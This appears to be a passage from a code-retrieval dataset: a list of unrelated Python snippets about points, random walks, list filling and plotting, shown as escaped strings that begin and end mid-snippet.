self.num_points:\n\n x_step = self.get_step()\n y_step = self.get_step()\n\n #rejects streps that do nowhere\n if y_step == 0 and x_step ==0:\n continue\n\n #calculate the next x and y values for the list and add it [-1] gets the last item in a list\n next_x = self.x_values[-1] + x_step\n next_y = self.y_values[-1] + y_step\n\n self.x_values.append(next_x)\n self.y_values.append(next_y)", "def assignPointsToShapes(self):\n pointsCopy = self.mission['points'].copy()\n\n while len(pointsCopy):\n shape = []\n self.recursiveAddPointToShape(pointsCopy, [pointsCopy[0]], shape)\n shape.append(shape[0])\n self.mission['shapes'].append(shape)", "def addPoints(self, points):\r\n self.points = points", "def set_points(self, pts):\n\n self.minX = sys.maxint\n self.minY = sys.maxint\n self.maxX = sys.maxint * -1\n self.maxY = sys.maxint * -1\n\n self.points = []\n #self.mbr = Rect()\n for p in pts:\n x,y = p\n\n if x < self.minX:\n self.minX = x\n if x > self.maxX:\n self.maxX = x\n if y < self.minY:\n self.minY = y\n if y > self.maxY:\n self.maxY = y\n\n self.points.append(Point(x,y))\n\n self.mbr = Rect(Point(self.minX,self.minY),Point(self.maxX,self.maxY))", "def __init__(self, *points):\n self_points = []\n self._min_values = []\n self._max_values = []\n\n if len(points) == 1:\n self.points = points[1]\n elif len(points) > 1:\n self.points = points", "def __init__(self, pts=[]):\n self.set_points(pts)", "def fit (self,points):\n all_coordinates = [p.coordinates for p in points]\n for i in range(len(all_coordinates[0])):\n if (len(self.min_coordinate)<=i):\n self.min_coordinate.append(all_coordinates[0][i])\n self.max_coordinate.append(all_coordinates[0][i])\n for x in all_coordinates:\n if(self.max_coordinate[i]<x[i]):\n self.max_coordinate[i]=x[i]\n if(self.min_coordinate[i]>x[i]):\n self.min_coordinate[i]=x[i]", "def add_points(self, points):\n pass", "def set_points(self, val=None):\r\n self._points = self.nx*self.ny*self.nz", "def fill_motion(self):\n while len(self.x_values) < self.num_points:\n x_direction = choice([1, -1])\n x_distance = choice([0, 1, 2, 3, 4])\n x_movement = x_direction * x_distance\n\n y_direction = choice([1, -1])\n y_distance = choice([0, 1, 2, 3, 4])\n y_movement = y_direction * y_distance\n\n # Rejecting motion that goes nowhere.\n if x_movement == 0 and y_movement == 0:\n continue\n\n # Calculating the next x and y values.\n next_x = self.x_values[-1] + x_movement\n next_y = self.y_values[-1] + y_movement\n\n self.x_values.append(next_x)\n self.y_values.append(next_y)", "def set_points(self, points):\n self.slmm = SlidingWindowMinMax()\n self.front = self.length - 1\n self.rear = None\n\n self.add_points(points)", "def __init__(self, points):\n self.points = points\n self.init()", "def addPoints(self, points):\n self.points.extend(points)", "def add_points(self, points):\n for pt in points:\n self._add(pt)\n self.update_limits()", "def __new_position(self):\n iterables = [range(self.size_x), range(self.size_y)]\n points = [] # Save all points in size.\n for point in itertools.product(*iterables):\n points.append(point)\n\n current_points = [] # Save used points.\n for object in self.objects:\n if (object.x, object.y) not in current_points:\n current_points.append((object.x, object.y))\n\n for point in current_points:\n points.remove(point) # Remove all used points.\n\n location = np.random.choice(a=range(len(points)), replace=False)\n return points[location]", "def generate_points(num_points):\n for i in xrange(0, num_points):\n pass", "def fill(self, water: float, ounces: int) -> None:\n self.values = []\n for i in range(ounces):\n self.values.append(water)", "def set_starting_points(self, number_of_points):\n n = int(number_of_points)\n self.init_value = n\n self.number_of_points = n\n self.x, self.y = [], []\n self.pp = [1] * 10\n self.pp_values = self.pp.copy()\n self.pp_mapping()\n r = 40\n for i in range(n):\n self.x.append(50 + r*math.cos(2*math.pi * i/n))\n self.y.append(50 + r*math.sin(2*math.pi * i/n))\n for i in self.text_boxes:\n i.set_val(\"1\")\n self.redraw()", "def add_points(self, *points):\r\n for pts in points:\r\n if not isinstance(pts, list):\r\n pts = [pts] # Make list of one\r\n for point in pts:\r\n self.points.append(point)", "def fill_walk(self):\n\n #keep taking steps until the walk reaches the desired length\n while len(self.x_values) < self.num_points:\n x_direction = choice([1,-1])\n x_distance = choice ([0,1,2,3,4])\n x_step = x_direction * x_distance\n\n y_direction = choice([1,-1])\n y_distance = choice ([0,1,2,3,4])\n y_step = y_direction * y_distance\n\n #calculate new x\n newx = self.x_values[-1]+x_step\n if newx < 0:\n newx = 0\n\n #calculate new y\n newy = self.y_values[-1] + y_step\n if newy < 0:\n newy = 0\n\n self.x_values.append(newx)\n self.y_values.append(newy)", "def fillInPoints(lsOriginal, intIterations = 1):\r\n assert len(lsOriginal) > 1\r\n \r\n # Loop through number of intermediate fillings.\r\n for j in range(0,intIterations):\r\n # New (filled) list.\r\n lsFilled = []\r\n for i in range(0, len(lsOriginal) - 1):\r\n lsFilled.append(lsOriginal[i])\r\n fltIntermediate = (lsOriginal[i] +\r\n (lsOriginal[i + 1] - lsOriginal[i]) / 2.0)\r\n lsFilled.append(fltIntermediate)\r\n # Edge case to add last element of original list.\r\n if i == (len(lsOriginal) - 2):\r\n lsFilled.append(lsOriginal[i + 1])\r\n lsOriginal = lsFilled\r\n \r\n # Return the filled list.\r\n return lsFilled", "def fill(self, func=lambda: random().getdigits(1), diag=None):\n for y,x in self.coords(diag):\n self.store(y,x, func())", "def __init__(self, points):\n\t\tself.points = points", "def update_data():\n values = temp_serial_placeholder()\n time = current_time_milli() - __start\n points = [ [time, values[0]], [time, values[1]] ]\n __data.append(points)\n return points", "def reset_points_table(self):\n num_agents = len(self.agent_locs)\n self.points_table = np.tile(self.default_points_table, [num_agents, 1, 1])", "def fix_datapoints(known_points, start_time, end_time, step, debug_key):\n logger.debug(\"fix_datapoints() key=%s len_known_points=%d\", debug_key, len(known_points))\n if len(known_points) == 1:\n logger.debug(\"fix_datapoints() key=%s only_known_point=%s\", debug_key, known_points[0])\n elif len(known_points) > 1:\n logger.debug(\"fix_datapoints() key=%s first_known_point=%s\", debug_key, known_points[0])\n logger.debug(\"fix_datapoints() key=%s last_known_point=%s\", debug_key, known_points[-1])\n\n datapoints = []\n steps = int(round((end_time - start_time) * 1.0 / step))\n # if we have 3 datapoints: at 0, at 60 and 120, then step is 60, steps = 2 and should have 3 points\n # note that graphite assumes data at quantized intervals, whereas in influx they can be stored at like 07, 67, etc.\n ratio = len(known_points) * 1.0 / (steps + 1)\n statsd.timer('service_is_graphite-api.target_type_is_gauge.unit_is_none.what_is_known_points/needed_points', ratio)\n\n if len(known_points) == steps + 1:\n logger.debug(\"fix_datapoints() key=%s -> no steps missing!\", debug_key)\n datapoints = [p[2] for p in known_points]\n else:\n amount = steps + 1 - len(known_points)\n logger.debug(\"fix_datapoints() key=%s -> fill %d missing steps with None values\", debug_key, amount)\n next_point = 0\n for s in range(0, steps + 1):\n # if we have no more known points, fill with None's\n # even ininitially when next_point = 0, len(known_points) might be == 0\n if next_point >= len(known_points):\n datapoints.append(None)\n continue\n\n # if points are not evenly spaced. i.e. they should be a minute apart but sometimes they are 55 or 65 seconds,\n # and if they are all about step/2 away from the target timestamps, then sometimes a target point has 2 candidates, and\n # sometimes 0. So a point might be more than step/2 older. in that case, since points are sorted, we can just forward the pointer\n # influxdb's fill(null) will make this cleaner and stop us from having to worry about this.\n\n should_be_near = start_time + step * s\n diff = known_points[next_point][0] - should_be_near\n while next_point + 1 < len(known_points) and diff < (step / 2) * -1:\n next_point += 1\n diff = known_points[next_point][0] - should_be_near\n\n # use this point if it's within step/2 from our target\n if abs(diff) <= step / 2:\n datapoints.append(known_points[next_point][2])\n next_point += 1 # note: might go out of bounds, which we use as signal\n\n else:\n datapoints.append(None)\n\n logger.debug(\"fix_datapoints() key=%s len_known_points=%d, len_datapoints=%d\", debug_key, len(known_points), len(datapoints))\n logger.debug(\"fix_datapoints() key=%s first_returned_point=%s, last_returned_point=%s\", debug_key, datapoints[0], datapoints[-1])\n return datapoints", "def get_dots(self):\n logging.debug('Generate dots to draw')\n gc = self.coordinates\n coords = []\n zmin = ymin = xmin = self.fmin = 999999\n self.fmax = 0\n for line in gc:\n temp = [None, None, None, None] # X, Y, Z, Feedrate\n for c in line:\n if c.startswith('X'):\n temp[0] = float(c[1:])\n xmin = min(xmin, temp[0])\n elif c.startswith('Y'):\n temp[1] = float(c[1:])\n ymin = min(ymin, temp[1])\n elif c.startswith('Z'):\n temp[2] = float(c[1:])\n zmin = min(zmin, temp[2])\n elif c.startswith('F'):\n temp[3] = int(float(c[1:]))\n self.fmin = min(self.fmin, temp[3])\n self.fmax = max(self.fmax, temp[3])\n if ((temp[0] is not None) or (temp[1] is not None) or\n (temp[2] is not None) or (temp[3] is not None)):\n if coords:\n if temp[0] is None:\n temp[0] = coords[-1][0]\n if temp[1] is None:\n temp[1] = coords[-1][1]\n if temp[2] is None:\n temp[2] = coords[-1][2]\n if temp[3] is None:\n temp[3] = coords[-1][3]\n coords.append(temp)\n\n if (self.fmin == 999999) or (self.fmax == 0):\n raise GcodeError('Please check feedrate')\n if (xmin == ymin == zmin == 999999):\n raise GcodeError('Please check coordinates')\n if xmin == 999999:\n xmin = 0\n if ymin == 999999:\n ymin = 0\n if zmin == 999999:\n zmin = 0\n\n for i in coords: # if something is still 0\n if i[0] is None:\n i[0] = xmin\n if i[1] is None:\n i[1] = ymin\n if i[2] is None:\n i[2] = zmin\n if i[3] is None:\n i[3] = self.fmin\n i[0] -= xmin\n i[1] -= ymin\n i[2] -= zmin\n i[3] -= self.fmin\n\n self.fmax -= self.fmin\n self.colors_list = grad(MIN_COLOR, MAX_COLOR, self.fmax+1)\n\n dots = []\n for i in range(len(coords)):\n temp = []\n if i != len(coords)-1:\n temp = self.getColorLine(coords[i], coords[i+1])\n if temp:\n dots.extend(temp)\n\n return dots", "def drawPoints(self, points, color):\n for p in points:\n Point\n p.color = color\n p.radius = self.points_radius\n p.conversion = False\n p.show(self.context)", "def initiate(self):\n pts = []\n for point in self.points:\n pt = gr.Point(point[0],point[1])\n pts.append(pt)\n\n self.vis = [gr.Polygon(pts)]\n\n self.draw()", "def applyToPoints(self, points):\n return [point + self for point in points]", "def set(self, point):\n self.components = [c for c in point]", "def fill_missing_data_points(data):\n return data.interpolate()", "def fill(self, filler):\n\n for x in range(self.__xmax):\n for y in range(self.__ymax):\n self.__data[(x,y)] = filler(x,y) % self.mod", "def fill_draw(self):\n self.draw = [x + str(y) for x in COLOR for y in CARD_VALUE]", "def _fill_input(self):\n for sc in self.initial:\n if sc not in self.litter:\n self.litter[sc] = [0., 0., 0., 0., 0., 0.,\n 0., 0., 0., 0., 0., 0.]\n for sc in self.litter:\n if sc not in self.initial:\n self.initial[sc] = [0., 0., 0., 0., 0., 0.,\n 0., 0., 0., 0., 0., 0.]", "def draw_filled_polygon(\n self, points: Iterable[Vec3], properties: Properties\n ) -> None:\n raise NotImplementedError", "def __init__(self, rows, columns, fillValue = None):\n self.data = []\n for row in range(rows):\n dataInRow = []\n for column in range(columns):\n dataInRow.append(fillValue)\n self.data.append(dataInRow)", "def fitPoints(self, points, atoms=None):\n self.dataPoints = points\n self.dataSignatures = []\n if atoms:\n iterList = zip(points, atoms)\n else:\n iterList = [(p, None) for p in points]\n for point, atom in iterList:\n testPoint = [c if c > 0 else self.size[i]-c for i, c in enumerate(point)]\n testPoint = [c if c < self.size[i] else c % self.size[i] for i, c in enumerate(testPoint)]\n signature = self.grid.getSignature2(testPoint, self.spacings)\n self.dataSignatures.append(signature)\n if not atoms:\n try:\n self.tree[tuple(signature)].append(point)\n except KeyError:\n self.tree[tuple(signature)] = [point]\n else:\n try:\n self.tree[tuple(signature)].append(atom)\n except KeyError:\n self.tree[tuple(signature)] = [atom]", "def init_hit_points(self, hit_points):\n self.hit_points = [hit_points, hit_points]", "def setPoints(self, value):\n assert type(value) in [int, float]\n self._points = value", "def set_points(self):\n for p in range(len(self.points)):\n self.points[p] = self.points[p] + self.speeds[p]\n if self.points[p].x > SCREEN_DIM[0] or self.points[p].x < 0:\n self.speeds[p].x = -self.speeds[p].x\n if self.points[p].y > SCREEN_DIM[1] or self.points[p].y < 0:\n self.speeds[p].y = -self.speeds[p].y", "def reset(self):\n super(PolygonTool, self).reset()\n # self.__nsides = None\n # self.__increment = None\n # self.__external = False # make this adjustable?\n self.__center = None\n for _i in range(self.__nsides):\n self.__xpts[_i] = 0.0\n self.__ypts[_i] = 0.0", "def get_all_xy(self):\n self.all_y = list(\n zip(\n self.open,\n self.open,\n self.high,\n self.low,\n self.close,\n self.close,\n self.empty,\n )\n )\n if self.dates is not None:\n date_dif = []\n for i in range(len(self.dates) - 1):\n date_dif.append(self.dates[i + 1] - self.dates[i])\n date_dif_min = (min(date_dif)) / 5\n self.all_x = [\n [x - date_dif_min, x, x, x, x, x + date_dif_min, None]\n for x in self.dates\n ]\n else:\n self.all_x = [\n [x - 0.2, x, x, x, x, x + 0.2, None] for x in range(len(self.open))\n ]", "def addDataPoints(self):\n pass", "def update(self, foodList):\n self.positions = list(map(lambda point: [point['x'], point['y']], foodList['data']))", "def find_points(self):\n\n points = [\n (self.inner_radius, 0, \"straight\"),\n (self.inner_radius, self.height / 2, \"straight\"),\n (self.outer_radius, self.height / 2, \"straight\"),\n (self.outer_radius, self.arc_height / 2, \"circle\"),\n (self.mid_radius, 0, \"circle\"),\n (self.outer_radius, -self.arc_height / 2, \"straight\"),\n (self.outer_radius, -self.height / 2, \"straight\"),\n (self.inner_radius, -self.height / 2, \"straight\")\n ]\n\n self.points = points", "def fill_octree(self):\n if len(self.children) <= 0:\n self.generate_octants()\n for point in self.points:\n self.append_point(point)\n self.points = np.array([])", "def create_points(self):\n v1 = 0.0\n v2 = 0.5\n v3 = 0.25\n v4 = 0.2 # only used for hexgrid\n\n points = []\n\n points.append((v1, v1, v1)) # 0\n points.append((v2, v1, v1)) # 1\n points.append((v2, v2, v1)) # 2\n points.append((v1, v2, v1)) # 3\n\n points.append((v1, v1, v2)) # 4\n points.append((v2, v1, v2)) # 5\n points.append((v2, v2, v2)) # 6\n points.append((v1, v2, v2)) # 7\n\n points.append((v3, v1, v1)) # 8\n points.append((v2, v3, v1)) # 9\n points.append((v3, v2, v1)) # 10\n points.append((v1, v3, v1)) # 11\n\n points.append((v1, v1, v3)) # 12\n points.append((v2, v1, v3)) # 13\n points.append((v2, v2, v3)) # 14\n points.append((v1, v2, v3)) # 15\n\n points.append((v3, v1, v2)) # 16\n points.append((v2, v3, v2)) # 17\n points.append((v3, v2, v2)) # 18\n points.append((v1, v3, v2)) # 19\n\n points.append((v4, v1, v1)) # 20\n points.append((v1, v4, v1)) # 21\n points.append((v1, v1, v4)) # 22\n\n return points", "def onUpdate(self):\n\t\t#fill all the order that satisfied\n\t\tfor x in filter(self.isFilled,self().keys()):\n\t\t\tself[x].fill()", "def fill_walk(self):\n\n # Keep taking steps until the walk reachs the desired length.\n while len(self.x_values) < self.num_points:\n # Decide how far to go in which direction\n x_step = self.get_step()\n y_step = self.get_step()\n\n # Reject moves that go nowhere.\n if x_step == 0 and y_step == 0:\n continue\n\n # Calculate the new position.\n x_position = self.x_values[-1] + x_step\n y_position = self.y_values[-1] + y_step\n\n self.x_values.append(x_position)\n self.y_values.append(y_position)", "def fill_walk(self):\n\n # Keep taking steps until the walk reachs the desired length.\n while len(self.x_values) < self.num_points:\n # Decide how far to go in which direction\n x_step = self.get_step()\n y_step = self.get_step()\n\n # Reject moves that go nowhere.\n if x_step == 0 and y_step == 0:\n continue\n\n # Calculate the new position.\n x_position = self.x_values[-1] + x_step\n y_position = self.y_values[-1] + y_step\n\n self.x_values.append(x_position)\n self.y_values.append(y_position)", "def update_tempLists(self):\n self.current_position = self.mediaPlayer.position()\n\n # I add the current value, calculates its index, and removes it. This method is used to know which index the pointer is at.\n bisect.insort(self.xValues,self.current_position)\n self.position_index = self.xValues.index(self.current_position)\n self.xValues.remove(self.current_position)\n\n n = 120\n if self.position_index < n: \n self.tempXList = self.xValues[:self.position_index + n]\n self.tempYList = self.yValues[:self.position_index + n]\n self.tempCList = self.colors[:self.position_index + n]\n else:\n self.tempXList = self.xValues[self.position_index - n :self.position_index + n]\n self.tempYList = self.yValues[self.position_index - n :self.position_index + n]\n self.tempCList = self.colors[self.position_index - n :self.position_index + n]", "def fill_missing(self) -> None:\n\n self.fill_missing_rows()\n self.fill_missing_source_parameters()\n return", "def DrawPointList(self, points, pens=None):\n if pens is None:\n pens = []\n elif isinstance(pens, wx.Pen):\n pens = [pens]\n elif len(pens) != len(points):\n raise ValueError('points and pens must have same length')\n return self._DrawPointList(points, pens, [])", "def _update_imgs_and_pt_list(self, points, edge_points, segs, index):\n # index specifies whether to use the x or y coordinate in x_pts\n x_pts=[]\n for i in range(0, len(points)):\n pt=points[i]\n #edge_points[pt[0],pt[1]] = 255\n x_pts.append(pt[index])\n #segs[pt[0],pt[1]]=150\n\n return x_pts, segs, edge_points", "def fill(self, value, x, y, width, height):\n for sub_y in range(y, y+height):\n for sub_x in range(x, x+width):\n self[sub_x, sub_y] = value", "def __init__(self, points):\n self.endpoints = points", "def func_init(self):\n self.points.set_data([], [])\n for line in self.lines:\n line.set_data([],[])\n self.annotation.set_text('')\n\n return tuple(self.lines) + (self.points, self.annotation)", "def setPointsActive(self):\r\n for point in self.points:\r\n point.setActive()", "def _accumulate_matching_points(self, points):\n if len(self.grid_points) != len(points):\n raise ValueError(\"Expected list of points of len %s, got %s\" % (len(self.grid_points), len(points)))\n for index in xrange(len(self.grid_points)):\n self._validate_descriptors_are_equal(self.grid_points[index].descriptor, points[index].descriptor, [\"frame\"])\n if isinstance(points[index].metrics, ClassificationMetricsValue):\n m = GridSearchClassificationMetrics._create_metric_sum(self.grid_points[index].metrics, points[index].metrics)\n elif isinstance(points[index].metrics, RegressionTestMetrics):\n m = GridSearchRegressionMetrics._create_metric_sum(self.grid_points[index].metrics, points[index].metrics)\n else:\n raise ValueError(\"Incorrect Metrics Class for '%s'\", m)\n self.grid_points[index] = GridPoint(self.grid_points[index].descriptor, m)", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def setPoints(self, points):\n ncells, num_verts_per_cell, ndim = points.shape\n if ndim != 3:\n raise RuntimeError(f'ERROR: points.shape[2] != 3, got {ndim}!')\n LIB.mnt_grid_setPointsPtr.argtypes = [POINTER(c_void_p), DOUBLE_ARRAY_PTR]\n LIB.mnt_grid_build.argtypes = [POINTER(c_void_p), c_int, c_longlong]\n ier = LIB.mnt_grid_setPointsPtr(self.obj, points)\n if ier:\n error_handler(FILE, 'setPointsPtr', ier)\n ier = LIB.mnt_grid_build(self.obj, num_verts_per_cell, ncells)\n if ier:\n error_handler(FILE, 'setPointsPtr', ier)", "def fillData(self):\n self.graphColors = c.getGraphColors()\n self._tupleListToStrings()\n self.colorlist.SetSelection(0)\n self.delayvalue.SetValue(str(c.getGraphDelay()))\n self._updateButtons(None)", "def fill(self, arr, color=None):\n\n for point in self.points:\n arr[point.x][point.y] = color if color is not None else point.color", "def _gather_points(self):\n # This is just a stub for now. We should really find the lines only\n # inside the screen range here.\n\n x = self.index.get_data()\n y = self.value.get_data()\n rad= min(self.width/2.0,self.height/2.0)\n sx = x*rad+ self.x + self.width/2.0\n sy = y*rad+ self.y + self.height/2.0\n\n points = transpose(array((sx,sy)))\n self._cached_data_pts = points\n self._cache_valid = True\n return", "def __init__(self, num_points = 5000):\n self.num_points = num_points\n\n #all walks start at 0.0\n self.x_values = [0]\n self.y_values = [0]", "def SetInitialPoints(self, x0, radius=0.05):\n raise NotImplementedError, \"must be overwritten...\"", "def fill_walk(self):\n\n #Seguir tomando caminos hasta que se alcance la cantidad establecida.\n while len(self.x_values) < self.num_points:\n\n #Decidir cual direccion tomar y cuan lejos ir hacia esa direccion.\n x_direction = choice([1, -1])\n x_distance = choice([0, 1, 2, 3, 4])\n x_step = x_direction * x_distance\n\n y_direction = choice([1,-1])\n y_distance = choice([0, 1, 2, 3, 4])\n y_step = y_direction * y_distance\n\n #Ignorar movimientos nulos.\n if x_step == 0 and y_step == 0:\n continue\n\n #Calcular la nueva posicion.\n x = self.x_values[-1] + x_step\n y = self.y_values[-1] + y_step\n\n self.x_values.append(x)\n self.y_values.append(y)", "def __init__(self, dataList):\n xList = []\n yList = []\n\n for index in range(0, len(dataList)):\n xList.append(dataList[index][0])\n yList.append(dataList[index][1])\n self.xList = xList\n self.yList = yList\n self.dataList = dataList", "def _InitialPoints(self):\n raise NotImplementedError, \"a sampling algorithm was not provided\"", "def grow_if_needed(self, points: List[Point]):\n if any(p not in self.grid for p in points):\n right = self.grid.right + 1\n bottom = self.grid.bottom + 1\n for y_pos in range(self.grid.top, bottom):\n new_point = Point(right, y_pos)\n self.grid[new_point] = self.get_geologic_level(new_point)\n for x_pos in range(self.grid.left, right + 1):\n new_point = Point(x_pos, bottom)\n self.grid[new_point] = self.get_geologic_level(new_point)", "def set_points(self, mode='', points=None, range_=RANGE, size=1):\n if mode == 'last':\n if points is None:\n print('Error: empty last point specification given.')\n return\n tol = 0.1\n [i, j, k] = points\n alpha = 2.0 * np.random.rand(1) + 0.5\n beta = 2.0 * np.random.rand(1) + 0.5\n if i >= 0 and j < 0 and k < 0:\n # at one corner of triangle\n assert i < 3\n other = np.delete(np.arange(3), i)\n u = (self.points[i, :] - self.points[other[0], :]\n ) / np.linalg.norm(\n self.points[i, :] - self.points[other[0], :])\n v = (self.points[i, :] - self.points[other[1], :]\n ) / np.linalg.norm(\n self.points[i, :] - self.points[other[1], :])\n self.points[-1, :] = self.points[i, :] + alpha * u + beta * v\n elif i >= 0 and j >= 0 and k < 0:\n found = False\n safety_it = 0\n while not found:\n alpha = np.random.uniform(tol, 1 - tol)\n beta = 1.0 - alpha\n gamma = 2 * np.random.rand(1) + tol\n assert j < 3\n other = np.delete(np.arange(3), (i, j))\n u = (\n self.points[i, :] - self.points[other, :]\n ) # /np.linalg.norm(self.points[i,:] - self.points[other,:])\n v = (\n self.points[j, :] - self.points[other, :]\n ) # /np.linalg.norm(self.points[j,:] - self.points[other,:])\n self.points[-1, :] = (1.0 + gamma) * (\n self.points[other, :] + alpha * u + beta * v)\n #check if new direction lies between u and v.\n new_direction = self.points[-1, :] - self.points[other, :]\n new_direction = new_direction.cp.reshape(\n (-1, )) / np.linalg.norm(new_direction)\n u = u.cp.reshape((-1, )) / np.linalg.norm(u)\n v = v.cp.reshape((-1, )) / np.linalg.norm(v)\n if abs(\n acos(np.dot(new_direction, u)) +\n acos(np.dot(new_direction, v)) -\n acos(np.dot(u, v))) < 1e-10:\n found = True\n safety_it += 1\n if safety_it > 100:\n print('Error: nothing found after 100 iterations.')\n return\n elif i >= 0 and j >= 0 and k >= 0:\n # inside triangle\n assert k < 3\n found = False\n safety_it = 0\n while not found:\n alpha = np.random.rand(1) + tol\n beta = np.random.rand(1) + tol\n other = np.delete(np.arange(3), i)\n u = self.points[other[0], :] - self.points[i, :]\n v = self.points[other[1], :] - self.points[i, :]\n temptative_point = self.points[i, :] + alpha * u + beta * v\n vjk = self.points[other[1], :] - self.points[other[0], :]\n njk = [vjk[1], -vjk[0]]\n if (np.dot(self.points[j, :] - self.points[i, :], njk) >\n 0) != (np.dot(temptative_point - self.points[j, :],\n njk) > 0):\n self.points[-1, :] = temptative_point\n found = True\n safety_it += 1\n if safety_it > 100:\n print('Error: nothing found after 100 iterations.')\n return\n elif i < 0 and j < 0 and k < 0:\n x = range_[0] + (\n range_[1] - range_[0]) * np.random.rand(1)\n y = range_[2] + (\n range_[1] - range_[0]) * np.random.rand(1)\n self.points[-1, :] = [x, y]\n else:\n print(\"Error: non-valid arguments.\")\n elif mode == 'random':\n \"\"\" Create N uniformly distributed points in [0, size] x [0, size]\n \"\"\"\n self.points = np.random.uniform(0, size, (self.N, self.d))\n elif mode == 'normal':\n self.points = np.random.normal(0, size, (self.N, self.d))\n elif mode == 'circle':\n from math import cos, sin\n x_range = size / 2.0\n y_range = size / 2.0\n c = np.array((x_range, y_range))\n r = 0.9 * min(x_range, y_range)\n theta = 2 * pi / self.N\n for i in range(self.N):\n theta_tot = i * theta\n self.points[i, :] = c + np.array(\n (r * cos(theta_tot), r * sin(theta_tot)))\n elif mode == 'set':\n \"\"\"\n Place points according to hard coded rule.\n \"\"\"\n if self.N == 3:\n x = [-1.0, 1.0, 0.0]\n y = [-1.0, -1.0, 1.0]\n elif self.N == 4:\n x = [-1.0, 1.0, 0.0, 0.0]\n y = [-1.0, -1.0, 1.0, 0.0]\n elif self.N == 5:\n x = [-0.0, 1.5, 1.5, -0.0, -1.0]\n y = [-1.0, -1.0, 1.0, 1.0, 0.0]\n else:\n print(\"Error: No rule defined for N = \", self.N)\n return\n self.points = np.c_[x, y]\n elif mode == 'geogebra':\n if self.N == 4:\n self.points = np.array(((1.5, 1.8), (7.9, 2.5), (2.3, 5.1),\n (3.34, -1.36)))\n elif self.N == 5:\n self.points = np.array(((1.5, 1.8), (7.9, 2.5), (2.3, 5.1),\n (3.34, -1.36), (5, 1.4)))\n else:\n print(\"Error: No rule defined for N = \", self.N)\n elif mode == '':\n if points is None:\n raise NotImplementedError(\"Need to give either mode or points.\")\n else:\n self.points = points\n self.N, self.d = points.shape\n\n self.init()", "def _sample(self, points: Iterable[float]) -> np.array:\n pass", "def _empty_clusters(clusters):\n for clst in clusters:\n clst.points = []", "def init(self, init_points):\n\n # Generate random points\n l = [numpy.random.uniform(x[0], x[1], size=init_points) for x in self.bounds]\n\n # Concatenate new random points to possible existing points from self.explore method.\n self.init_points += list(map(list, zip(*l)))\n\n # Create empty list to store the new values of the function\n y_init = []\n\n # Evaluate target function at all initialization points (random + explore)\n for x in self.init_points:\n\n if self.verbose:\n print('Initializing function at point: ', dict(zip(self.keys, x)), end='')\n\n y_init.append(self.f(**dict(zip(self.keys, x))))\n\n if self.verbose:\n print(' | result: %f' % y_init[-1])\n\n # Append any other points passed by the self.initialize method (these also have\n # a corresponding target value passed by the user).\n self.init_points += self.x_init\n\n # Append the target value of self.initialize method.\n y_init += self.y_init\n\n # Turn it into numpy array and store.\n self.X = numpy.asarray(self.init_points)\n self.Y = numpy.asarray(y_init)\n\n # Updates the flag\n self.initialized = True", "def setPointsToTurn(self):\r\n for point in self.points:\r\n point.setActiveTurn()", "def create_points(data):\n #TODO list comprehension\n for row in data:\n\n if row[\"x\"] and row[\"y\"]:\n try:\n row[\"geometry\"] = point.Point(float(row[\"x\"]), float(row[\"y\"]))\n except:\n row[\"geometry\"] = None\n else:\n row[\"geometry\"] = None\n\n return data", "def addpoints(self, x, w):\n if isinstance(x, list) and isinstance(w, list):\n self.xp.extend(x)\n self.wp.extend(w)\n else:\n self.xp.append(x)\n self.wp.append(w)", "def pointListForPlus(x, y):\n\n\tpointList = []\n\n\tif x < 10:\n\t\txString = \"0%d\" % x\n\telse:\n\t\txString = \"%d\" % x\n\n\tif x < 11:\n\t\txMString = \"0%d\" % (x - 1)\n\telse:\n\t\txMString = \"%d\" % (x - 1)\n\n\tif x < 9:\n\t\txPString = \"0%d\" % (x + 1)\n\telse:\n\t\txPString = \"%d\" % (x + 1)\n\n\tif y < 11:\n\t\tyMString = \"0%d\" % (y - 1)\n\telse:\n\t\tyMString = \"%d\" % (y - 1)\n\n\tif y < 9:\n\t\tyPString = \"0%d\" % (y + 1)\n\telse:\n\t\tyPString = \"%d\" % (y + 1)\n\n\tif y < 10:\n\t\tyString = \"0%d\" % y\n\telse:\n\t\tyString = \"%d\" % y\n\n\ttl = [\"%s%sTL\" % (xString, yString), 0.25, 0.25, [\t\"%s%sTR\" % (xMString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sBL\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sCC\" % (xString, yString)]]\n\ttr = [\"%s%sTR\" % (xString, yString), 0.75, 0.25, [\t\"%s%sTL\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sBR\" % (xString, yMString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sCC\" % (xString, yString)]]\n\tbl = [\"%s%sBL\" % (xString, yString), 0.25, 0.75, [\t\"%s%sBR\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sTL\" % (xString, yPString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sCC\" % (xString, yString)]]\n\tbr = [\"%s%sBR\" % (xString, yString), 0.75, 0.75, [\t\"%s%sBL\" % (xPString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sTR\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sCC\" % (xString, yString)]]\n\tcc = [\"%s%sCC\" % (xString, yString), 0.50, 0.50, [\t\"%s%sTL\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sTR\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sBL\" % (xString, yString),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"%s%sBR\" % (xString, yString)]]\n\n\tpointList = [tl, tr, bl, br, cc]\n\n\treturn pointList", "def __init__(self, num_points=5000):\n self.num_points = num_points\n\n # All walks start at (0, 0)\n self.x_values = [0]\n self.y_values = [0]", "def __init__(self, num_points=5000):\n self.num_points = num_points\n\n # All walks start at (0, 0)\n self.x_values = [0]\n self.y_values = [0]", "def _createPoints(self):\n self.doc2quest = self._docMapping()\n\n self.unigram, self.bigram = invertedIndex(self.documents)\n self.points = [dataPoint(key, self) for key in self.questions.keys()]", "def test_fill():\r\n CONSTANTE_DEBUT = 0\r\n CONSTANTE_FIN= 20\r\n CONSTANTE_DEBUT_2 = 0\r\n CONSTANTE_FIN_2 = 1000\r\n TAILLE_MAX= 10\r\n print(\"test 1\")\r\n # on teste avec que des valeurs comprises entre 0 et 20\r\n 